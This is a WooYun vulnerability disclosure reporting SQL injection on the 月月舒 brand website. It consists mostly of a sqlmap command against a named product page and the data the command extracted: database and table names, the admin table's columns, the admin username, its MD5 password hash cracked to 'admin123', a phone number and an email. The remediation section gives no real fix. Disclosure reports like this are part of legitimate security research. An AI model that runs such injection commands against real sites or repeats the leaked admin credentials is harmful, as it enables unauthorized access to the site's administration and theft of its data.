当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143651

漏洞标题:好闺蜜冷白开之月月舒官网SQL注射/管理相关信息脱出/弱密码

相关厂商:月月舒

漏洞作者: 冷白开。

提交时间:2015-09-28 07:55

修复时间:2015-11-12 07:56

公开时间:2015-11-12 07:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

冷白开也要谈恋爱~~妹子快来

详细说明:

sqlmap.py -u "http://www.yueyueshu.com/product.php?catid=2" --dbs

11.png

相关数据

available databases [2]:
[*] information_schema
[*] yysdate
Database: yysdate
[14 tables]
+--------------------+
| eninfo_board |
| eninfo_category |
| eninfo_content |
| eninfo_wenda |
| enproduct_category |
| enproduct_content |
| info_board |
| info_category |
| info_content |
| info_wenda |
| manager_role |
| manager_users |
| product_category |
| product_content |
+--------------------+
Database: yysdate
Table: manager_users
[16 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| address | varchar(250) |
| city | varchar(50) |
| country | varchar(50) |
| EmailName | varchar(50) |
| id | int(11) |
| is_verify | tinyint(4) |
| moblie | varchar(50) |
| phone | varchar(200) |
| province | varchar(50) |
| psw | varchar(50) |
| regtime | datetime |
| sex | tinyint(1) |
| truename | varchar(200) |
| UserGrade | int(4) |
| username | varchar(255) |
| zip | varchar(50) |
+-----------+--------------+
Database: yysdate
Table: manager_users
[1 entry]
+----------+
| username |
+----------+
| admin |
+----------+
Database: yysdate
Table: manager_users
[1 entry]
+----------------------------------+
| psw |
+----------------------------------+
| 0192023a7bbd73250516f069df18b500 |明文:admin123
+----------------------------------+
Database: yysdate
Table: manager_users
[1 entry]
+----------+
| phone |
+----------+
| 57163850 |
+----------+
Database: yysdate
Table: manager_users
[1 entry]
+-----------+
| EmailName |
+-----------+
| 1@2.com |
+-----------+

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论